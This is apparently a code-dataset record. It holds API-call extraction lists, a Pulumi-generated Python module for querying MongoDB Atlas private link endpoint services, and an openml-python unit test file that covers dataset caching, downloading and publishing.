(22007, 22010), False, 'import time\n'), ((22539, 22552), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (22549, 22552), False, 'import time\n'), ((22695, 22732), 'dxlclient.Request', 'Request', ([], {'destination_topic': 'test_topic'}), '(destination_topic=test_topic)\n', (22702, 22732), False, 'from dxlclient import Request\n'), ((22762, 22799), 'dxlclient.UuidGenerator.generate_id_as_string', 'UuidGenerator.generate_id_as_string', ([], {}), '()\n', (22797, 22799), False, 'from dxlclient import UuidGenerator\n'), ((7454, 7514), 'dxlclient.DxlClientConfig.create_dxl_config_from_file', 'DxlClientConfig.create_dxl_config_from_file', (['"""mock_file.cfg"""'], {}), "('mock_file.cfg')\n", (7497, 7514), False, 'from dxlclient import DxlClientConfig\n'), ((8496, 8518), 'dxlclient.Response', 'Response', ([], {'request': 'None'}), '(request=None)\n', (8504, 8518), False, 'from dxlclient import Response\n'), ((10455, 10492), 'dxlclient.UuidGenerator.generate_id_as_string', 'UuidGenerator.generate_id_as_string', ([], {}), '()\n', (10490, 10492), False, 'from dxlclient import UuidGenerator\n'), ((12616, 12658), 'dxlclient.Event', 'Event', ([], {'destination_topic': 'self.test_channel'}), '(destination_topic=self.test_channel)\n', (12621, 12658), False, 'from dxlclient import Event\n'), ((13122, 13166), 'dxlclient.Request', 'Request', ([], {'destination_topic': 'self.test_channel'}), '(destination_topic=self.test_channel)\n', (13129, 13166), False, 'from dxlclient import Request\n'), ((13624, 13646), 'dxlclient.Response', 'Response', ([], {'request': 'None'}), '(request=None)\n', (13632, 13646), False, 'from dxlclient import Response\n'), ((20487, 20524), 'dxlclient.UuidGenerator.generate_id_as_string', 'UuidGenerator.generate_id_as_string', ([], {}), '()\n', (20522, 20524), False, 'from dxlclient import UuidGenerator\n'), ((6221, 6238), 'textwrap.dedent', 'dedent', (['read_data'], {}), '(read_data)\n', (6227, 6238), False, 'from textwrap import dedent\n'), ((7369, 7386), 'textwrap.dedent', 'dedent', (['read_data'], {}), '(read_data)\n', (7375, 7386), False, 'from textwrap import dedent\n'), ((7778, 7795), 'textwrap.dedent', 'dedent', (['read_data'], {}), '(read_data)\n', (7784, 7795), False, 'from textwrap import dedent\n')]
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = [
'GetPrivateLinkEndpointServiceResult',
'AwaitableGetPrivateLinkEndpointServiceResult',
'get_private_link_endpoint_service',
]
@pulumi.output_type
class GetPrivateLinkEndpointServiceResult:
"""
A collection of values returned by getPrivateLinkEndpointService.
"""
def __init__(__self__, aws_connection_status=None, azure_status=None, delete_requested=None, endpoint_service_id=None, error_message=None, id=None, interface_endpoint_id=None, private_endpoint_connection_name=None, private_endpoint_ip_address=None, private_endpoint_resource_id=None, private_link_id=None, project_id=None, provider_name=None):
if aws_connection_status and not isinstance(aws_connection_status, str):
raise TypeError("Expected argument 'aws_connection_status' to be a str")
pulumi.set(__self__, "aws_connection_status", aws_connection_status)
if azure_status and not isinstance(azure_status, str):
raise TypeError("Expected argument 'azure_status' to be a str")
pulumi.set(__self__, "azure_status", azure_status)
if delete_requested and not isinstance(delete_requested, bool):
raise TypeError("Expected argument 'delete_requested' to be a bool")
pulumi.set(__self__, "delete_requested", delete_requested)
if endpoint_service_id and not isinstance(endpoint_service_id, str):
raise TypeError("Expected argument 'endpoint_service_id' to be a str")
pulumi.set(__self__, "endpoint_service_id", endpoint_service_id)
if error_message and not isinstance(error_message, str):
raise TypeError("Expected argument 'error_message' to be a str")
pulumi.set(__self__, "error_message", error_message)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if interface_endpoint_id and not isinstance(interface_endpoint_id, str):
raise TypeError("Expected argument 'interface_endpoint_id' to be a str")
pulumi.set(__self__, "interface_endpoint_id", interface_endpoint_id)
if private_endpoint_connection_name and not isinstance(private_endpoint_connection_name, str):
raise TypeError("Expected argument 'private_endpoint_connection_name' to be a str")
pulumi.set(__self__, "private_endpoint_connection_name", private_endpoint_connection_name)
if private_endpoint_ip_address and not isinstance(private_endpoint_ip_address, str):
raise TypeError("Expected argument 'private_endpoint_ip_address' to be a str")
pulumi.set(__self__, "private_endpoint_ip_address", private_endpoint_ip_address)
if private_endpoint_resource_id and not isinstance(private_endpoint_resource_id, str):
raise TypeError("Expected argument 'private_endpoint_resource_id' to be a str")
pulumi.set(__self__, "private_endpoint_resource_id", private_endpoint_resource_id)
if private_link_id and not isinstance(private_link_id, str):
raise TypeError("Expected argument 'private_link_id' to be a str")
pulumi.set(__self__, "private_link_id", private_link_id)
if project_id and not isinstance(project_id, str):
raise TypeError("Expected argument 'project_id' to be a str")
pulumi.set(__self__, "project_id", project_id)
if provider_name and not isinstance(provider_name, str):
raise TypeError("Expected argument 'provider_name' to be a str")
pulumi.set(__self__, "provider_name", provider_name)
@property
@pulumi.getter(name="awsConnectionStatus")
def aws_connection_status(self) -> str:
"""
Status of the interface endpoint for AWS.
Returns one of the following values:
"""
return pulumi.get(self, "aws_connection_status")
@property
@pulumi.getter(name="azureStatus")
def azure_status(self) -> str:
"""
Status of the interface endpoint for AZURE.
Returns one of the following values:
"""
return pulumi.get(self, "azure_status")
@property
@pulumi.getter(name="deleteRequested")
def delete_requested(self) -> bool:
"""
Indicates if Atlas received a request to remove the interface endpoint from the private endpoint connection.
"""
return pulumi.get(self, "delete_requested")
@property
@pulumi.getter(name="endpointServiceId")
def endpoint_service_id(self) -> str:
return pulumi.get(self, "endpoint_service_id")
@property
@pulumi.getter(name="errorMessage")
def error_message(self) -> str:
"""
Error message pertaining to the interface endpoint. Returns null if there are no errors.
"""
return pulumi.get(self, "error_message")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="interfaceEndpointId")
def interface_endpoint_id(self) -> str:
"""
Unique identifier of the interface endpoint.
"""
return pulumi.get(self, "interface_endpoint_id")
@property
@pulumi.getter(name="privateEndpointConnectionName")
def private_endpoint_connection_name(self) -> str:
"""
Name of the connection for this private endpoint that Atlas generates.
"""
return pulumi.get(self, "private_endpoint_connection_name")
@property
@pulumi.getter(name="privateEndpointIpAddress")
def private_endpoint_ip_address(self) -> str:
"""
Private IP address of the private endpoint network interface.
"""
return pulumi.get(self, "private_endpoint_ip_address")
@property
@pulumi.getter(name="privateEndpointResourceId")
def private_endpoint_resource_id(self) -> str:
"""
Unique identifier of the private endpoint.
"""
return pulumi.get(self, "private_endpoint_resource_id")
@property
@pulumi.getter(name="privateLinkId")
def private_link_id(self) -> str:
return pulumi.get(self, "private_link_id")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> str:
return pulumi.get(self, "project_id")
@property
@pulumi.getter(name="providerName")
def provider_name(self) -> str:
return pulumi.get(self, "provider_name")
class AwaitableGetPrivateLinkEndpointServiceResult(GetPrivateLinkEndpointServiceResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetPrivateLinkEndpointServiceResult(
aws_connection_status=self.aws_connection_status,
azure_status=self.azure_status,
delete_requested=self.delete_requested,
endpoint_service_id=self.endpoint_service_id,
error_message=self.error_message,
id=self.id,
interface_endpoint_id=self.interface_endpoint_id,
private_endpoint_connection_name=self.private_endpoint_connection_name,
private_endpoint_ip_address=self.private_endpoint_ip_address,
private_endpoint_resource_id=self.private_endpoint_resource_id,
private_link_id=self.private_link_id,
project_id=self.project_id,
provider_name=self.provider_name)
def get_private_link_endpoint_service(endpoint_service_id: Optional[str] = None,
private_link_id: Optional[str] = None,
project_id: Optional[str] = None,
provider_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetPrivateLinkEndpointServiceResult:
"""
`PrivateLinkEndpointService` describe a Private Endpoint Link. This represents a Private Endpoint Link Connection that wants to retrieve details in an Atlas project.
> **NOTE:** Groups and projects are synonymous terms. You may find group_id in the official documentation.
:param str endpoint_service_id: Unique identifier of the `AWS` or `AZURE` resource.
:param str private_link_id: Unique identifier of the private endpoint service for which you want to retrieve a private endpoint.
:param str project_id: Unique identifier for the project.
:param str provider_name: Cloud provider for which you want to create a private endpoint. Atlas accepts `AWS` or `AZURE`.
"""
__args__ = dict()
__args__['endpointServiceId'] = endpoint_service_id
__args__['privateLinkId'] = private_link_id
__args__['projectId'] = project_id
__args__['providerName'] = provider_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('mongodbatlas:index/getPrivateLinkEndpointService:getPrivateLinkEndpointService', __args__, opts=opts, typ=GetPrivateLinkEndpointServiceResult).value
return AwaitableGetPrivateLinkEndpointServiceResult(
aws_connection_status=__ret__.aws_connection_status,
azure_status=__ret__.azure_status,
delete_requested=__ret__.delete_requested,
endpoint_service_id=__ret__.endpoint_service_id,
error_message=__ret__.error_message,
id=__ret__.id,
interface_endpoint_id=__ret__.interface_endpoint_id,
private_endpoint_connection_name=__ret__.private_endpoint_connection_name,
private_endpoint_ip_address=__ret__.private_endpoint_ip_address,
private_endpoint_resource_id=__ret__.private_endpoint_resource_id,
private_link_id=__ret__.private_link_id,
project_id=__ret__.project_id,
provider_name=__ret__.provider_name)
|
[
"pulumi.get",
"pulumi.getter",
"pulumi.set",
"pulumi.InvokeOptions",
"pulumi.runtime.invoke"
] |
[((3941, 3982), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""awsConnectionStatus"""'}), "(name='awsConnectionStatus')\n", (3954, 3982), False, 'import pulumi\n'), ((4223, 4256), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""azureStatus"""'}), "(name='azureStatus')\n", (4236, 4256), False, 'import pulumi\n'), ((4481, 4518), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""deleteRequested"""'}), "(name='deleteRequested')\n", (4494, 4518), False, 'import pulumi\n'), ((4772, 4811), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""endpointServiceId"""'}), "(name='endpointServiceId')\n", (4785, 4811), False, 'import pulumi\n'), ((4929, 4963), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""errorMessage"""'}), "(name='errorMessage')\n", (4942, 4963), False, 'import pulumi\n'), ((5378, 5419), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""interfaceEndpointId"""'}), "(name='interfaceEndpointId')\n", (5391, 5419), False, 'import pulumi\n'), ((5618, 5669), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""privateEndpointConnectionName"""'}), "(name='privateEndpointConnectionName')\n", (5631, 5669), False, 'import pulumi\n'), ((5916, 5962), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""privateEndpointIpAddress"""'}), "(name='privateEndpointIpAddress')\n", (5929, 5962), False, 'import pulumi\n'), ((6190, 6237), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""privateEndpointResourceId"""'}), "(name='privateEndpointResourceId')\n", (6203, 6237), False, 'import pulumi\n'), ((6448, 6483), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""privateLinkId"""'}), "(name='privateLinkId')\n", (6461, 6483), False, 'import pulumi\n'), ((6593, 6624), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""projectId"""'}), "(name='projectId')\n", (6606, 6624), False, 'import pulumi\n'), ((6724, 6758), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""providerName"""'}), "(name='providerName')\n", (6737, 6758), False, 'import pulumi\n'), ((1154, 1222), 'pulumi.set', 'pulumi.set', (['__self__', '"""aws_connection_status"""', 'aws_connection_status'], {}), "(__self__, 'aws_connection_status', aws_connection_status)\n", (1164, 1222), False, 'import pulumi\n'), ((1370, 1420), 'pulumi.set', 'pulumi.set', (['__self__', '"""azure_status"""', 'azure_status'], {}), "(__self__, 'azure_status', azure_status)\n", (1380, 1420), False, 'import pulumi\n'), ((1582, 1640), 'pulumi.set', 'pulumi.set', (['__self__', '"""delete_requested"""', 'delete_requested'], {}), "(__self__, 'delete_requested', delete_requested)\n", (1592, 1640), False, 'import pulumi\n'), ((1809, 1873), 'pulumi.set', 'pulumi.set', (['__self__', '"""endpoint_service_id"""', 'endpoint_service_id'], {}), "(__self__, 'endpoint_service_id', endpoint_service_id)\n", (1819, 1873), False, 'import pulumi\n'), ((2024, 2076), 'pulumi.set', 'pulumi.set', (['__self__', '"""error_message"""', 'error_message'], {}), "(__self__, 'error_message', error_message)\n", (2034, 2076), False, 'import pulumi\n'), ((2194, 2224), 'pulumi.set', 'pulumi.set', (['__self__', '"""id"""', 'id'], {}), "(__self__, 'id', id)\n", (2204, 2224), False, 'import pulumi\n'), ((2399, 2467), 'pulumi.set', 'pulumi.set', (['__self__', '"""interface_endpoint_id"""', 'interface_endpoint_id'], {}), "(__self__, 'interface_endpoint_id', interface_endpoint_id)\n", (2409, 2467), False, 'import pulumi\n'), ((2675, 2769), 'pulumi.set', 'pulumi.set', (['__self__', '"""private_endpoint_connection_name"""', 'private_endpoint_connection_name'], {}), "(__self__, 'private_endpoint_connection_name',\n private_endpoint_connection_name)\n", (2685, 2769), False, 'import pulumi\n'), ((2958, 3043), 'pulumi.set', 'pulumi.set', (['__self__', '"""private_endpoint_ip_address"""', 'private_endpoint_ip_address'], {}), "(__self__, 'private_endpoint_ip_address', private_endpoint_ip_address\n )\n", (2968, 3043), False, 'import pulumi\n'), ((3234, 3320), 'pulumi.set', 'pulumi.set', (['__self__', '"""private_endpoint_resource_id"""', 'private_endpoint_resource_id'], {}), "(__self__, 'private_endpoint_resource_id',\n private_endpoint_resource_id)\n", (3244, 3320), False, 'import pulumi\n'), ((3473, 3529), 'pulumi.set', 'pulumi.set', (['__self__', '"""private_link_id"""', 'private_link_id'], {}), "(__self__, 'private_link_id', private_link_id)\n", (3483, 3529), False, 'import pulumi\n'), ((3671, 3717), 'pulumi.set', 'pulumi.set', (['__self__', '"""project_id"""', 'project_id'], {}), "(__self__, 'project_id', project_id)\n", (3681, 3717), False, 'import pulumi\n'), ((3868, 3920), 'pulumi.set', 'pulumi.set', (['__self__', '"""provider_name"""', 'provider_name'], {}), "(__self__, 'provider_name', provider_name)\n", (3878, 3920), False, 'import pulumi\n'), ((4161, 4202), 'pulumi.get', 'pulumi.get', (['self', '"""aws_connection_status"""'], {}), "(self, 'aws_connection_status')\n", (4171, 4202), False, 'import pulumi\n'), ((4428, 4460), 'pulumi.get', 'pulumi.get', (['self', '"""azure_status"""'], {}), "(self, 'azure_status')\n", (4438, 4460), False, 'import pulumi\n'), ((4715, 4751), 'pulumi.get', 'pulumi.get', (['self', '"""delete_requested"""'], {}), "(self, 'delete_requested')\n", (4725, 4751), False, 'import pulumi\n'), ((4869, 4908), 'pulumi.get', 'pulumi.get', (['self', '"""endpoint_service_id"""'], {}), "(self, 'endpoint_service_id')\n", (4879, 4908), False, 'import pulumi\n'), ((5136, 5169), 'pulumi.get', 'pulumi.get', (['self', '"""error_message"""'], {}), "(self, 'error_message')\n", (5146, 5169), False, 'import pulumi\n'), ((5335, 5357), 'pulumi.get', 'pulumi.get', (['self', '"""id"""'], {}), "(self, 'id')\n", (5345, 5357), False, 'import pulumi\n'), ((5556, 5597), 'pulumi.get', 'pulumi.get', (['self', '"""interface_endpoint_id"""'], {}), "(self, 'interface_endpoint_id')\n", (5566, 5597), False, 'import pulumi\n'), ((5843, 5895), 'pulumi.get', 'pulumi.get', (['self', '"""private_endpoint_connection_name"""'], {}), "(self, 'private_endpoint_connection_name')\n", (5853, 5895), False, 'import pulumi\n'), ((6122, 6169), 'pulumi.get', 'pulumi.get', (['self', '"""private_endpoint_ip_address"""'], {}), "(self, 'private_endpoint_ip_address')\n", (6132, 6169), False, 'import pulumi\n'), ((6379, 6427), 'pulumi.get', 'pulumi.get', (['self', '"""private_endpoint_resource_id"""'], {}), "(self, 'private_endpoint_resource_id')\n", (6389, 6427), False, 'import pulumi\n'), ((6537, 6572), 'pulumi.get', 'pulumi.get', (['self', '"""private_link_id"""'], {}), "(self, 'private_link_id')\n", (6547, 6572), False, 'import pulumi\n'), ((6673, 6703), 'pulumi.get', 'pulumi.get', (['self', '"""project_id"""'], {}), "(self, 'project_id')\n", (6683, 6703), False, 'import pulumi\n'), ((6810, 6843), 'pulumi.get', 'pulumi.get', (['self', '"""provider_name"""'], {}), "(self, 'provider_name')\n", (6820, 6843), False, 'import pulumi\n'), ((9207, 9229), 'pulumi.InvokeOptions', 'pulumi.InvokeOptions', ([], {}), '()\n', (9227, 9229), False, 'import pulumi\n'), ((9321, 9496), 'pulumi.runtime.invoke', 'pulumi.runtime.invoke', (['"""mongodbatlas:index/getPrivateLinkEndpointService:getPrivateLinkEndpointService"""', '__args__'], {'opts': 'opts', 'typ': 'GetPrivateLinkEndpointServiceResult'}), "(\n 'mongodbatlas:index/getPrivateLinkEndpointService:getPrivateLinkEndpointService'\n , __args__, opts=opts, typ=GetPrivateLinkEndpointServiceResult)\n", (9342, 9496), False, 'import pulumi\n')]
|
import unittest
import os
import sys
if sys.version_info[0] >= 3:
from unittest import mock
else:
import mock
from oslo_concurrency import lockutils
import scipy.sparse
import openml
from openml import OpenMLDataset
from openml.exceptions import OpenMLCacheException, PyOpenMLError
from openml.testing import TestBase
from openml.datasets.functions import (_get_cached_dataset,
_get_cached_dataset_features,
_get_cached_dataset_qualities,
_get_cached_datasets,
_get_dataset_description,
_get_dataset_arff,
_get_dataset_features,
_get_dataset_qualities)
class TestOpenMLDataset(TestBase):
_multiprocess_can_split_ = True
def setUp(self):
super(TestOpenMLDataset, self).setUp()
def tearDown(self):
self._remove_pickle_files()
super(TestOpenMLDataset, self).tearDown()
def _remove_pickle_files(self):
cache_dir = self.static_cache_dir
for did in ['-1', '2']:
with lockutils.external_lock(
name='datasets.functions.get_dataset:%s' % did,
lock_path=os.path.join(openml.config.get_cache_directory(), 'locks'),
):
pickle_path = os.path.join(cache_dir, 'datasets', did,
'dataset.pkl')
try:
os.remove(pickle_path)
except:
pass
def test__list_cached_datasets(self):
openml.config.set_cache_directory(self.static_cache_dir)
cached_datasets = openml.datasets.functions._list_cached_datasets()
self.assertIsInstance(cached_datasets, list)
self.assertEqual(len(cached_datasets), 2)
self.assertIsInstance(cached_datasets[0], int)
@mock.patch('openml.datasets.functions._list_cached_datasets')
def test__get_cached_datasets(self, _list_cached_datasets_mock):
openml.config.set_cache_directory(self.static_cache_dir)
_list_cached_datasets_mock.return_value = [-1, 2]
datasets = _get_cached_datasets()
self.assertIsInstance(datasets, dict)
self.assertEqual(len(datasets), 2)
self.assertIsInstance(list(datasets.values())[0], OpenMLDataset)
def test__get_cached_dataset(self, ):
openml.config.set_cache_directory(self.static_cache_dir)
dataset = _get_cached_dataset(2)
features = _get_cached_dataset_features(2)
qualities = _get_cached_dataset_qualities(2)
self.assertIsInstance(dataset, OpenMLDataset)
self.assertTrue(len(dataset.features) > 0)
self.assertTrue(len(dataset.features) == len(features['oml:feature']))
self.assertTrue(len(dataset.qualities) == len(qualities))
def test_get_cached_dataset_description(self):
openml.config.set_cache_directory(self.static_cache_dir)
description = openml.datasets.functions._get_cached_dataset_description(2)
self.assertIsInstance(description, dict)
def test_get_cached_dataset_description_not_cached(self):
openml.config.set_cache_directory(self.static_cache_dir)
self.assertRaisesRegexp(OpenMLCacheException, "Dataset description for "
"dataset id 3 not cached",
openml.datasets.functions._get_cached_dataset_description,
3)
def test_get_cached_dataset_arff(self):
openml.config.set_cache_directory(self.static_cache_dir)
description = openml.datasets.functions._get_cached_dataset_arff(
dataset_id=2)
self.assertIsInstance(description, str)
def test_get_cached_dataset_arff_not_cached(self):
openml.config.set_cache_directory(self.static_cache_dir)
self.assertRaisesRegexp(OpenMLCacheException, "ARFF file for "
"dataset id 3 not cached",
openml.datasets.functions._get_cached_dataset_arff,
3)
def test_list_datasets(self):
# We can only perform a smoke test here because we test on dynamic
# data from the internet...
datasets = openml.datasets.list_datasets()
# 1087 as the number of datasets on openml.org
self.assertGreaterEqual(len(datasets), 100)
for did in datasets:
self._check_dataset(datasets[did])
def test_list_datasets_by_tag(self):
datasets = openml.datasets.list_datasets(tag='study_14')
self.assertGreaterEqual(len(datasets), 100)
for did in datasets:
self._check_dataset(datasets[did])
def test_list_datasets_paginate(self):
size = 10
max = 100
for i in range(0, max, size):
datasets = openml.datasets.list_datasets(offset=i, size=size)
self.assertGreaterEqual(size, len(datasets))
for did in datasets:
self._check_dataset(datasets[did])
@unittest.skip('See https://github.com/openml/openml-python/issues/149')
def test_check_datasets_active(self):
active = openml.datasets.check_datasets_active([1, 17])
self.assertTrue(active[1])
self.assertFalse(active[17])
self.assertRaisesRegexp(ValueError, 'Could not find dataset 79 in OpenML'
' dataset list.',
openml.datasets.check_datasets_active, [79])
def test_get_datasets(self):
dids = [1, 2]
datasets = openml.datasets.get_datasets(dids)
self.assertEqual(len(datasets), 2)
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "1", "description.xml")))
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "2", "description.xml")))
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "1", "dataset.arff")))
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "2", "dataset.arff")))
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "1", "features.xml")))
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "2", "features.xml")))
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "1", "qualities.xml")))
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "2", "qualities.xml")))
def test_get_dataset(self):
dataset = openml.datasets.get_dataset(1)
self.assertEqual(type(dataset), OpenMLDataset)
self.assertEqual(dataset.name, 'anneal')
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "1", "description.xml")))
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "1", "dataset.arff")))
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "1", "features.xml")))
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "1", "qualities.xml")))
self.assertGreater(len(dataset.features), 1)
self.assertGreater(len(dataset.qualities), 4)
def test_get_dataset_with_string(self):
dataset = openml.datasets.get_dataset(101)
self.assertRaises(PyOpenMLError, dataset._get_arff, 'arff')
self.assertRaises(PyOpenMLError, dataset.get_data)
def test_get_dataset_sparse(self):
dataset = openml.datasets.get_dataset(102)
X = dataset.get_data()
self.assertIsInstance(X, scipy.sparse.csr_matrix)
def test_download_rowid(self):
# Smoke test which checks that the dataset has the row-id set correctly
did = 44
dataset = openml.datasets.get_dataset(did)
self.assertEqual(dataset.row_id_attribute, 'Counter')
def test__get_dataset_description(self):
description = _get_dataset_description(self.workdir, 2)
self.assertIsInstance(description, dict)
description_xml_path = os.path.join(self.workdir,
'description.xml')
self.assertTrue(os.path.exists(description_xml_path))
def test__getarff_path_dataset_arff(self):
openml.config.set_cache_directory(self.static_cache_dir)
description = openml.datasets.functions._get_cached_dataset_description(2)
arff_path = _get_dataset_arff(self.workdir, description)
self.assertIsInstance(arff_path, str)
self.assertTrue(os.path.exists(arff_path))
def test__getarff_md5_issue(self):
description = {
'oml:id': 5,
'oml:md5_checksum': 'abc',
'oml:url': 'https://www.openml.org/data/download/61',
}
self.assertRaisesRegexp(
ValueError,
'Checksum ad484452702105cbf3d30f8deaba39a9 of downloaded dataset 5 '
'is unequal to the checksum abc sent by the server.',
_get_dataset_arff,
self.workdir, description,
)
def test__get_dataset_features(self):
features = _get_dataset_features(self.workdir, 2)
self.assertIsInstance(features, dict)
features_xml_path = os.path.join(self.workdir, 'features.xml')
self.assertTrue(os.path.exists(features_xml_path))
def test__get_dataset_qualities(self):
# Only a smoke check
qualities = _get_dataset_qualities(self.workdir, 2)
self.assertIsInstance(qualities, list)
def test_deletion_of_cache_dir(self):
# Simple removal
did_cache_dir = openml.datasets.functions.\
_create_dataset_cache_directory(1)
self.assertTrue(os.path.exists(did_cache_dir))
openml.datasets.functions._remove_dataset_cache_dir(did_cache_dir)
self.assertFalse(os.path.exists(did_cache_dir))
# Use _get_dataset_arff to load the description, trigger an exception in the
# test target and have a slightly higher coverage
@mock.patch('openml.datasets.functions._get_dataset_arff')
def test_deletion_of_cache_dir_faulty_download(self, patch):
patch.side_effect = Exception('Boom!')
self.assertRaisesRegexp(Exception, 'Boom!', openml.datasets.get_dataset,
1)
datasets_cache_dir = os.path.join(self.workdir, 'datasets')
self.assertEqual(len(os.listdir(datasets_cache_dir)), 0)
def test_publish_dataset(self):
dataset = openml.datasets.get_dataset(3)
file_path = os.path.join(openml.config.get_cache_directory(),
"datasets", "3", "dataset.arff")
dataset = OpenMLDataset(
name="anneal", version=1, description="test",
format="ARFF", licence="public", default_target_attribute="class", data_file=file_path)
dataset.publish()
self.assertIsInstance(dataset.dataset_id, int)
def test__retrieve_class_labels(self):
openml.config.set_cache_directory(self.static_cache_dir)
labels = openml.datasets.get_dataset(2).retrieve_class_labels()
self.assertEqual(labels, ['1', '2', '3', '4', '5', 'U'])
labels = openml.datasets.get_dataset(2).retrieve_class_labels(
target_name='product-type')
self.assertEqual(labels, ['C', 'H', 'G'])
def test_upload_dataset_with_url(self):
dataset = OpenMLDataset(
name="UploadTestWithURL", version=1, description="test",
format="ARFF",
url="https://www.openml.org/data/download/61/dataset_61_iris.arff")
dataset.publish()
self.assertIsInstance(dataset.dataset_id, int)
|
[
"openml.datasets.functions._get_cached_datasets",
"os.remove",
"openml.datasets.list_datasets",
"openml.config.set_cache_directory",
"os.path.join",
"openml.datasets.functions._create_dataset_cache_directory",
"openml.datasets.functions._get_cached_dataset",
"os.path.exists",
"openml.OpenMLDataset",
"openml.datasets.get_dataset",
"openml.datasets.functions._get_cached_dataset_features",
"openml.datasets.get_datasets",
"openml.datasets.functions._get_dataset_features",
"openml.datasets.functions._get_dataset_arff",
"mock.patch",
"openml.datasets.functions._list_cached_datasets",
"openml.datasets.functions._get_dataset_qualities",
"openml.datasets.check_datasets_active",
"os.listdir",
"openml.datasets.functions._remove_dataset_cache_dir",
"openml.datasets.functions._get_cached_dataset_description",
"unittest.skip",
"openml.datasets.functions._get_dataset_description",
"openml.config.get_cache_directory",
"openml.datasets.functions._get_cached_dataset_qualities",
"openml.datasets.functions._get_cached_dataset_arff"
] |
[((2007, 2068), 'mock.patch', 'mock.patch', (['"""openml.datasets.functions._list_cached_datasets"""'], {}), "('openml.datasets.functions._list_cached_datasets')\n", (2017, 2068), False, 'import mock\n'), ((5237, 5308), 'unittest.skip', 'unittest.skip', (['"""See https://github.com/openml/openml-python/issues/149"""'], {}), "('See https://github.com/openml/openml-python/issues/149')\n", (5250, 5308), False, 'import unittest\n'), ((10599, 10656), 'mock.patch', 'mock.patch', (['"""openml.datasets.functions._get_dataset_arff"""'], {}), "('openml.datasets.functions._get_dataset_arff')\n", (10609, 10656), False, 'import mock\n'), ((1710, 1766), 'openml.config.set_cache_directory', 'openml.config.set_cache_directory', (['self.static_cache_dir'], {}), '(self.static_cache_dir)\n', (1743, 1766), False, 'import openml\n'), ((1793, 1842), 'openml.datasets.functions._list_cached_datasets', 'openml.datasets.functions._list_cached_datasets', ([], {}), '()\n', (1840, 1842), False, 'import openml\n'), ((2146, 2202), 'openml.config.set_cache_directory', 'openml.config.set_cache_directory', (['self.static_cache_dir'], {}), '(self.static_cache_dir)\n', (2179, 2202), False, 'import openml\n'), ((2280, 2302), 'openml.datasets.functions._get_cached_datasets', '_get_cached_datasets', ([], {}), '()\n', (2300, 2302), False, 'from openml.datasets.functions import _get_cached_dataset, _get_cached_dataset_features, _get_cached_dataset_qualities, _get_cached_datasets, _get_dataset_description, _get_dataset_arff, _get_dataset_features, _get_dataset_qualities\n'), ((2516, 2572), 'openml.config.set_cache_directory', 'openml.config.set_cache_directory', (['self.static_cache_dir'], {}), '(self.static_cache_dir)\n', (2549, 2572), False, 'import openml\n'), ((2591, 2613), 'openml.datasets.functions._get_cached_dataset', '_get_cached_dataset', (['(2)'], {}), '(2)\n', (2610, 2613), False, 'from openml.datasets.functions import _get_cached_dataset, _get_cached_dataset_features, _get_cached_dataset_qualities, _get_cached_datasets, _get_dataset_description, _get_dataset_arff, _get_dataset_features, _get_dataset_qualities\n'), ((2633, 2664), 'openml.datasets.functions._get_cached_dataset_features', '_get_cached_dataset_features', (['(2)'], {}), '(2)\n', (2661, 2664), False, 'from openml.datasets.functions import _get_cached_dataset, _get_cached_dataset_features, _get_cached_dataset_qualities, _get_cached_datasets, _get_dataset_description, _get_dataset_arff, _get_dataset_features, _get_dataset_qualities\n'), ((2685, 2717), 'openml.datasets.functions._get_cached_dataset_qualities', '_get_cached_dataset_qualities', (['(2)'], {}), '(2)\n', (2714, 2717), False, 'from openml.datasets.functions import _get_cached_dataset, _get_cached_dataset_features, _get_cached_dataset_qualities, _get_cached_datasets, _get_dataset_description, _get_dataset_arff, _get_dataset_features, _get_dataset_qualities\n'), ((3028, 3084), 'openml.config.set_cache_directory', 'openml.config.set_cache_directory', (['self.static_cache_dir'], {}), '(self.static_cache_dir)\n', (3061, 3084), False, 'import openml\n'), ((3107, 3167), 'openml.datasets.functions._get_cached_dataset_description', 'openml.datasets.functions._get_cached_dataset_description', (['(2)'], {}), '(2)\n', (3164, 3167), False, 'import openml\n'), ((3288, 3344), 'openml.config.set_cache_directory', 'openml.config.set_cache_directory', (['self.static_cache_dir'], 